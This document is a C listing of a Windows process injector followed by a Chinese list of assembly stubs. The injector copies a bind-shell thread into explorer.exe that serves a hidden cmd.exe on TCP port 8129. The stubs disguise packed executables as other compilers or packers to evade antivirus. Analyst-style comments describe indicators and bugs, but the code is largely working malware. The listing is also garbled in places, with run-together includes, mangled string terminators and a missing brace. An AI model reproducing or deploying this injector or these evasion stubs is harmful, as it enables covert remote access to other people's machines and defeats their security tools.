

    #include<winsock2.h>#pragma comment(lib,"ws2_32.lib")#include<windows.h>#include <Shlwapi.h>#pragma comment(lib,"Shlwapi.lib")#include <tlhelp32.h>#include <stdio.h>#include <string.h>

    // Parameter block handed to the injected thread.  ThreadProc is copied
    // byte-for-byte into another process (see WinMain), so it cannot use the
    // injector's import table: every API it needs is passed in here as a raw
    // address, together with the string constants it uses.  DWORD-sized
    // addresses make this a 32-bit-only layout.  For an analyst, a block of
    // resolved kernel32/wsock32 entry points followed by "cmd.exe" is a strong
    // indicator of this injection pattern.
    typedef struct _RemotePara {
        DWORD dwLoadLibrary;
        DWORD dwFreeLibrary;
        DWORD dwGetProcAddress;
        DWORD dwGetModuleHandle;
        DWORD dwWSAStartup;
        DWORD dwSocket;
        DWORD dwhtons;
        DWORD dwbind;
        DWORD dwlisten;
        DWORD dwaccept;
        DWORD dwsend;
        DWORD dwrecv;
        DWORD dwclosesocket;
        DWORD dwCreateProcessA;
        DWORD dwPeekNamedPipe;
        DWORD dwWriteFile;
        DWORD dwReadFile;
        DWORD dwCloseHandle;
        DWORD dwCreatePipe;
        DWORD dwTerminateProcess;
        DWORD dwMessageBox;

        char strMessageBox[12];   // set to "Sucess!//0" in WinMain; only used by a commented-out MessageBoxA call
        char winsockDll[16];      // "wsock32.dll//0": DLL name the payload loads into the host process
        char cmd[10];             // "cmd.exe//0" is 10 characters, so strcat's terminator lands in Buff[0]
        char Buff[4096];          // shared buffer for the pipe <-> socket relay loop
        char telnetmsg[60];       // banner; the send of it is commented out in ThreadProc
    } RemotePara;

    // Enable or disable one named privilege on a token (used for SeDebugPrivilege).
    BOOL EnablePrivilege(HANDLE hToken, LPCTSTR szPrivName, BOOL fEnable);
    // Look up a process ID from an image name (prefix match, see definition).
    DWORD GetPidByName(char *szName);

    // Body of the injected thread.  WinMain copies THREADSIZE bytes starting at
    // this function into the target process and starts it there with a pointer
    // to a RemotePara block, so the code has to be self-contained: it must not
    // reference the injector's globals, imports or string literals, which is
    // why every API is reached through an address carried in *Para.  memset and
    // ZeroMemory below are the only direct calls; NOTE(review): they can only
    // work if the compiler expands them inline, since a real CRT call would
    // target an address valid only in the injector's own process.
    //
    // What it does: loads the winsock DLL named in Para, listens on TCP port
    // 8129 on all interfaces, accepts a single connection, starts Para->cmd
    // with its standard handles attached to two anonymous pipes, and relays
    // bytes between the socket and those pipes until a call fails.  That is a
    // bind shell running inside the host process; the fixed port, the RWX
    // allocation made by WinMain, and a cmd.exe whose parent is the injected
    // process are the observable indicators.
    DWORD __stdcall ThreadProc(RemotePara *Para) {
        WSADATA WSAData;
        WORD nVersion;
        SOCKET listenSocket;
        SOCKET clientSocket;
        struct sockaddr_in server_addr;
        struct sockaddr_in client_addr;
        int iAddrSize = sizeof(client_addr);
        SECURITY_ATTRIBUTES sa;          // never initialised before &sa is passed to PCreatePipe
        HANDLE hReadPipe1;
        HANDLE hWritePipe1;
        HANDLE hReadPipe2;
        HANDLE hWritePipe2;
        STARTUPINFO si;
        PROCESS_INFORMATION ProcessInformation;
        unsigned long lBytesRead = 0;    // unsigned; see the recv() result check in the loop

        // Typed prototypes for the kernel32 entry points carried in Para.
        typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
        typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
        typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
        typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

        // The remaining APIs are kept as untyped FARPROC and called with the
        // argument list of the real function.
        FARPROC PMessageBoxA;
        FARPROC PWSAStartup;
        FARPROC PSocket;
        FARPROC Phtons;
        FARPROC Pbind;
        FARPROC Plisten;
        FARPROC Paccept;
        FARPROC Psend;
        FARPROC Precv;
        FARPROC Pclosesocket;
        FARPROC PCreateProcessA;
        FARPROC PPeekNamedPipe;
        FARPROC PWriteFile;
        FARPROC PReadFile;
        FARPROC PCloseHandle;
        FARPROC PCreatePipe;
        FARPROC PTerminateProcess;

        PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
        PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;   // assigned, never used
        PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;               // assigned, never used
        PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; // assigned, never used

        // Make sure the winsock DLL is mapped in the host process.  The socket
        // addresses below were resolved in the injector's process, so they are
        // only valid here if the DLL sits at the same base address.
        LoadLibraryFunc(Para->winsockDll);

        PWSAStartup = (FARPROC)Para->dwWSAStartup;
        PSocket    = (FARPROC)Para->dwSocket;
        Phtons        = (FARPROC)Para->dwhtons;
        Pbind       = (FARPROC)Para->dwbind;
        Plisten    = (FARPROC)Para->dwlisten;
        Paccept    = (FARPROC)Para->dwaccept;
        Psend       = (FARPROC)Para->dwsend;
        Precv       = (FARPROC)Para->dwrecv;
        Pclosesocket   = (FARPROC)Para->dwclosesocket;
        PCreateProcessA = (FARPROC)Para->dwCreateProcessA;
        PPeekNamedPipe     = (FARPROC)Para->dwPeekNamedPipe;
        PWriteFile       = (FARPROC)Para->dwWriteFile;
        PReadFile       = (FARPROC)Para->dwReadFile;
        PCloseHandle    = (FARPROC)Para->dwCloseHandle;
        PCreatePipe        = (FARPROC)Para->dwCreatePipe;
        PTerminateProcess   = (FARPROC)Para->dwTerminateProcess;   // resolved but never called: the child is not terminated
        PMessageBoxA    = (FARPROC)Para->dwMessageBox;              // only used by the commented-out call at the end

        nVersion = MAKEWORD(2,1);
        PWSAStartup(nVersion, (LPWSADATA)&WSAData);   // return value not checked
        listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
        if(listenSocket == INVALID_SOCKET)return 0;

        // Listen on every interface, fixed port 8129.
        server_addr.sin_family    = AF_INET;
        server_addr.sin_port        = Phtons((unsigned short)(8129));
        server_addr.sin_addr.s_addr = INADDR_ANY;

        if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
        if(Plisten(listenSocket, 5))return 0;
        // Blocks until one client connects; the result is not compared with INVALID_SOCKET.
        clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
        // Psend(clientSocket, Para->telnetmsg, 60, 0);

        // Pipe 1: child stdout/stderr -> this thread.  Pipe 2: this thread -> child stdin.
        // `sa` is indeterminate here, so the inheritability CreatePipe reads from it is too.
        if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
        if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;

        ZeroMemory(&si,sizeof(si)); // original author's note: ZeroMemory is a C runtime routine and can be called directly
        // Hidden window; the child's standard handles are redirected to the pipes.
        si.dwFlags     = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
        si.wShowWindow = SW_HIDE;
        si.hStdInput = hReadPipe2;
        si.hStdOutput   = si.hStdError = hWritePipe1;

        // bInheritHandles is 1 so the pipe ends are visible to the child.
        if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;

        // Relay loop: forward anything the child has written to the socket;
        // otherwise block on the socket and forward client input to the child.
        while(1) {
            memset(Para->Buff,0,4096);
            PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
            if(lBytesRead) {
                if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
                // Only a 0 return ends the loop; SOCKET_ERROR (-1) is non-zero and is not detected.
                if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
            }else {
                // recv() returns int but is stored in an unsigned long, so
                // SOCKET_ERROR (-1) becomes ULONG_MAX and passes the <= 0 test.
                lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
                if(lBytesRead <=0 ) break;
                if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;
            }
        }

        // Tear down our ends; the child process is left running.
        PCloseHandle(hWritePipe2);
        PCloseHandle(hReadPipe1);
        PCloseHandle(hReadPipe2);
        PCloseHandle(hWritePipe1);
        Pclosesocket(listenSocket);
        Pclosesocket(clientSocket);

        // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);

        return 0;
    }

    // Injector entry point.  The sequence below is the textbook remote-thread
    // injection chain that process-injection detections commonly key on:
    //   1. enable SeDebugPrivilege on the current token,
    //   2. OpenProcess(PROCESS_ALL_ACCESS) on the first process named EXPLORER.EXE,
    //   3. VirtualAllocEx a 4 KB PAGE_EXECUTE_READWRITE region and
    //      WriteProcessMemory the bytes at &ThreadProc into it,
    //   4. fill a RemotePara with addresses resolved in *this* process and
    //      copy it over too,
    //   5. CreateRemoteThread on the copied code, then spin forever.
    // The (DWORD) casts on GetProcAddress results make this 32-bit only.
    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPSTR     lpCmdLine,
                         int    nCmdShow) {
        const DWORD THREADSIZE=1024*4;
        DWORD byte_write;
        void *pRemoteThread;
        HANDLE hToken,hRemoteProcess,hThread;
        HINSTANCE hKernel,hUser32,hSock;
        RemotePara myRemotePara,*pRemotePara;
        DWORD pID;

        // Neither result is checked; injection proceeds even if the privilege
        // could not be enabled.
        OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
        EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

        // Get a handle to the target process with PROCESS_ALL_ACCESS.
        pID = GetPidByName("EXPLORER.EXE");
        if(pID == 0)return 0;
        hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
        if(!hRemoteProcess)return 0;

        // Allocate virtual memory in the remote process's address space.
        pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
        if(!pRemoteThread)return 0;

        // Copy the thread body ThreadProc into the remote process.  A flat
        // THREADSIZE-byte copy from &ThreadProc assumes the function is shorter
        // than 4 KB, position independent, and that &ThreadProc is the body
        // itself — NOTE(review): under incremental linking it may be a jump
        // thunk instead.
        if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0;

        // Resolve every API the payload needs in this process.  The addresses
        // are only meaningful in the target if the same DLLs are mapped there
        // at the same base.
        ZeroMemory(&myRemotePara,sizeof(RemotePara));
        hKernel = LoadLibrary( "kernel32.dll");
        myRemotePara.dwLoadLibrary    = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
        myRemotePara.dwFreeLibrary    = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
        myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
        myRemotePara.dwGetModuleHandle   = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");

        myRemotePara.dwCreateProcessA     = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
        myRemotePara.dwPeekNamedPipe    = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
        myRemotePara.dwWriteFile       = (DWORD)GetProcAddress(hKernel, "WriteFile");
        myRemotePara.dwReadFile           = (DWORD)GetProcAddress(hKernel, "ReadFile");
        myRemotePara.dwCloseHandle        = (DWORD)GetProcAddress(hKernel, "CloseHandle");
        myRemotePara.dwCreatePipe       = (DWORD)GetProcAddress(hKernel, "CreatePipe");
        myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess");

        hSock = LoadLibrary("wsock32.dll");
        myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup");
        myRemotePara.dwSocket    = (DWORD)GetProcAddress(hSock,"socket");
        myRemotePara.dwhtons        = (DWORD)GetProcAddress(hSock,"htons");
        myRemotePara.dwbind       = (DWORD)GetProcAddress(hSock,"bind");
        myRemotePara.dwlisten    = (DWORD)GetProcAddress(hSock,"listen");
        myRemotePara.dwaccept    = (DWORD)GetProcAddress(hSock,"accept");
        myRemotePara.dwrecv       = (DWORD)GetProcAddress(hSock,"recv");
        myRemotePara.dwsend       = (DWORD)GetProcAddress(hSock,"send");
        myRemotePara.dwclosesocket   = (DWORD)GetProcAddress(hSock,"closesocket");

        hUser32 = LoadLibrary("user32.dll");
        myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");

        // String constants for the payload.  The struct was zeroed above, so
        // strcat appends to empty strings.  The literal `//0` in each string
        // presumably stood for a `\0` terminator in the original source; as
        // written it is two ordinary characters, and "cmd.exe//0" is 10 of
        // them, so its terminator is written into Buff[0].
        strcat(myRemotePara.strMessageBox,"Sucess!//0");
        strcat(myRemotePara.winsockDll,"wsock32.dll//0");
        strcat(myRemotePara.cmd,"cmd.exe//0");
        strcat(myRemotePara.telnetmsg,"Connect Sucessful!//n//0");

        // Write the parameter block into the target process.
        pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
        if(!pRemotePara)return 0;
        if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;

        // Start the remote thread.  hThread is never checked or closed.
        hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
        // Spin forever: everything after this loop, including the library and
        // handle cleanup, is unreachable.
        while(1) {}
        FreeLibrary(hKernel);
        FreeLibrary(hSock);
        FreeLibrary(hUser32);
        CloseHandle(hRemoteProcess);
        CloseHandle(hToken);

        return 0;
    }

    // Turns a single named privilege on or off on hToken; WinMain calls it
    // with SE_DEBUG_NAME before OpenProcess.  Neither LookupPrivilegeValue nor
    // AdjustTokenPrivileges has its return value checked — success is judged
    // solely from GetLastError(), which AdjustTokenPrivileges sets to
    // ERROR_NOT_ALL_ASSIGNED when the privilege is not held by the token.
    BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable) {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
        AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
        return((GetLastError() == ERROR_SUCCESS));
    }

    // Returns the PID of the first process whose image name matches szName
    // case-insensitively over strlen(szName) characters — a prefix match, not
    // an exact one — or 0 if nothing matches or the snapshot cannot be taken.
    DWORD GetPidByName(char *szName) {
        HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
        PROCESSENTRY32 pe32={0};
        DWORD dwRet=0;

        hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;

        pe32.dwSize = sizeof(PROCESSENTRY32);
        if(Process32First(hProcessSnap, &pe32)) {
            do {
                if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) {
                    dwRet=pe32.th32ProcessID;
                    break;
                }
            }while (Process32Next(hProcessSnap,&pe32));
        }else return 0;   // returns without closing hProcessSnap: the snapshot handle leaks on this path

        // The INVALID_HANDLE_VALUE test is redundant; that case already returned above.
        if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
        return dwRet;
    // NOTE(review): the function's closing brace is missing from the listing as published.

    1.伪装vc++5.0代码:PUSH EBP  MOV EBP,ESP  PUSH -1  push 415448   -/___PUSH 4021A8   -/   在这段代码中类似这样的操作数可以乱填  MOV EAX,DWORD PTR FS:[0]  PUSH EAX  MOV DWORD PTR FS:[0],ESP  ADD ESP,-6C  PUSH EBX  PUSH ESI  PUSH EDI  ADD BYTE PTR DS:[EAX],AL   /这条指令可以不要!jmp 原入口地址

    ************************************************************************2.胡乱跳转代码:noppush ebpmov ebp,espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxloop somewhere   /跳转到上面那段代码地址去! 

    somewhere:  nop   /"胡乱"跳转的开始...jmp 下一个jmp的地址   /在附近随意跳jmp ...   /...jmp 原入口地址   /跳到原始oep

    90 55 8B EC 41 52 90 5A 49 5D 41

    转储免杀

    ************************************************************************3.伪装c++代码:push ebpmov ebp,esppush -1push 111111push 222222mov eax,fs:[0]push eaxmov fs:[0],esppop eaxmov fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址

    ************************************************************************4.伪装Microsoft Visual C++ 6.0代码:

    PUSH -1PUSH 0PUSH 0MOV EAX,DWORD PTR FS:[0]PUSH EAXMOV DWORD PTR FS:[0],ESPSUB ESP,68PUSH EBXPUSH ESIPUSH EDIPOP EAXPOP EAXPOP EAXADD ESP,68POP EAXMOV DWORD PTR FS:[0],EAXPOP EAXPOP EAXPOP EAXPOP EAXMOV EBP,EAXJMP 原入口地址

    push ebpmov ebp,espjmp

    ************************************************************************5.伪装防杀精灵一号防杀代码:push ebpmov ebp,esppush -1push 666666push 888888mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],esppop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址

    ************************************************************************6.伪装防杀精灵二号防杀代码:push ebpmov ebp,esppush -1push 0push 0mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],espsub esp,68push ebxpush esipush edipop eaxpop eaxpop eaxadd esp,68pop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址

    ************************************************************************7.伪装木马彩衣(无限复活袍)代码:PUSH EBP  MOV EBP,ESP  PUSH -1  push 415448   -/___PUSH 4021A8   -/   在这段代码中类似这样的操作数可以乱填  MOV EAX,DWORD PTR FS:[0]  PUSH EAX  MOV DWORD PTR FS:[0],ESP  ADD ESP,-6C  PUSH EBX  PUSH ESI  PUSH EDI  ADD BYTE PTR DS:[EAX],AL   /这条指令可以不要!jo 原入口地址jno 原入口地址call 下一地址

    ************************************************************************8.伪装木马彩衣(虾米披风)代码:push ebpnopnopmov ebp,espinc ecxnoppush edxnopnoppop edxnoppop ebpinc ecxloop somewhere /跳转到下面那段代码地址去!

    someshere:nop   /"胡乱"跳转的开始...jmp 下一个jmp的地址   /在附近随意跳jmp ...   /...jmp 原入口的地址   /跳到原始oep

    9.伪装花花添加器(神话)代码:-----------根据C++改nopnopnopmov ebp,esppush -1push 111111push 222222mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],esppop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxmov eax,原入口地址push eaxretn

    ************************************************************************10.伪装花花添加器(无极)代码:nopmov   ebp, esppush   -1push   0A2C2Apush   0D9038mov   eax, fs:[0]push   eaxmov   fs:[0], esppop   eaxmov   fs:[0], eaxpop   eaxpop   eaxpop   eaxpop   eaxmov   ebp, eaxmov   eax, 原入口地址jmp   eax

    ************************************************************************11.伪装花花添加器(金刚)代码:--------根据VC++5.0改nopnopmov   ebp, esppush   -1push   415448push   4021A8 mov   eax, fs:[0]push   eaxmov   fs:[0], espadd   esp, -6Cpush   ebxpush   esipush   ediadd   [eax], almov   eax,原入口地址jmp   eax

    ************************************************************************12.伪装花花添加器(杀破浪)代码:nopmov   ebp, esppush   -1push   0push   0mov   eax, fs:[0]push   eaxmov   fs:[0], espsub   esp, 68push   ebxpush   esipush   edipop   eaxpop   eaxpop   eaxadd   esp, 68pop   eaxmov   fs:[0], eaxpop   eaxpop   eaxpop   eaxpop   eaxmov   ebp, eaxmov   eax, 原入口地址jmp   eax

    ************************************************************************12.伪装花花添加器(痴情大圣)代码:nop..........省略N行nopnoppush   ebpmov   ebp, espadd   esp, -0Cadd   esp, 0Cmov   eax, 原入口地址push   eaxretn

    ************************************************************************13.伪装花花添加器(如果*爱)代码:nop........省略N行nopnoppush   ebpmov   ebp, espinc   ecxpush   edxnoppop   edxdec   ecxpop   ebpinc   ecxmov   eax, 原入口地址jmp   eax

    ************************************************************************14.伪装PEtite 2.2 -> Ian Luck代码:mov eax,0040E000push 004153F3push dword ptr fs:[0]mov dword ptr fs:[0],esppushfwpushadpush eaxxor ebx,ebxpop eaxpopadpopfwpop dword ptr fs:[0]pop eaxjmp 原入口地址   '执行到程序的原有OEP

    ************************************************************************15.无效PE文件代码:push ebp  mov ebp,espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxMOV DWORD PTR FS:[0],EAX   /POP EAX   | POP EAX   /MOV DWORD PTR FS:[0],EAX   |(注意了。。花指令)POP EAX   / POP EAX   |MOV DWORD PTR FS:[0],EAX   /loop 原入口地址

    ************************************************************************16.伪装防杀精灵终极防杀代码:push ebpmov ebp,espadd esp,-0Cadd esp,0Cpush eaxjmp 原入口地址

    ************************************************************************17.伪装木马彩衣(金色鱼锦衣)花代码push ebpmov ebp,espadd esp,-0Cadd esp,0Cmov eax,原入口地址push eaxretn

    ************************************************************************18.在mov ebp,eax后面加上PUSH EAX POP EAX

    ************************************************************************19.伪装UPX花指令代码:

    pushadmov esi,m.0044D000lea edi,dword ptr ds:[esi+FFFB4000]push edior ebp,FFFFFFFFjmp short m.00477F2A

    ************************************************************************20.push ebp mov ebp,esp inc ecx push edx pop edx dec ecx pop ebp inc ecx jmp 原入口

    ************************************************************************

